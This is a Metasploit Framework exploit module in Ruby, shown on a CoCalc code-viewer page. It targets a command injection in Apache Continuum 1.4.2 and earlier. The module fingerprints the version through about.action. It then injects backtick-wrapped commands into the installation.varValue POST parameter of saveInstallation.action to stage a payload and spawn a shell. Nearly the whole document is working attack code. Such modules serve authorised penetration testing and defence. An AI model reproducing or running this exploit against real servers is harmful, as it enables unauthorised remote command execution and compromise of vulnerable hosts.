CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/apache_continuum_cmd_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'Apache Continuum Arbitrary Command Execution',

15
      'Description'    => %q{

16
        This module exploits a command injection in Apache Continuum <= 1.4.2.

17
        By injecting a command into the installation.varValue POST parameter to

18
        /continuum/saveInstallation.action, a shell can be spawned.

19
      },

20
      'Author'         => [

21
        'David Shanahan', # Proof of concept

22
        'wvu'             # Metasploit module

23
      ],

24
      'References'     => [

25
        %w{EDB 39886}

26
      ],

27
      'DisclosureDate' => '2016-04-06',

28
      'License'        => MSF_LICENSE,

29
      'Platform'       => 'linux',

30
      'Arch'           => [ARCH_X86, ARCH_X64],

31
      'Privileged'     => false,

32
      'Targets'        => [

33
        ['Apache Continuum <= 1.4.2', {}]

34
      ],

35
      'DefaultTarget'  => 0

36
    ))

37


38
    register_options([

39
      Opt::RPORT(8080)

40
    ])

41
  end

42


43
  def check

44
    res = send_request_cgi(

45
      'method' => 'GET',

46
      'uri'    => '/continuum/about.action'

47
    )

48


49
    if res && res.body.include?('1.4.2')

50
      CheckCode::Appears

51
    elsif res && res.code == 200

52
      CheckCode::Detected

53
    else

54
      CheckCode::Safe

55
    end

56
  end

57


58
  def exploit

59
    print_status('Injecting CmdStager payload...')

60
    execute_cmdstager

61
  end

62


63
  def execute_command(cmd, opts = {})

64
    send_request_cgi(

65
      'method'    => 'POST',

66
      'uri'       => '/continuum/saveInstallation.action',

67
      'vars_post' => {

68
        'installation.name'     => Rex::Text.rand_text_alpha(8),

69
        'installation.type'     => 'jdk',

70
        'installation.varValue' => '`' + cmd + '`'

71
      }

72
    )

73
  end

74
end

75


76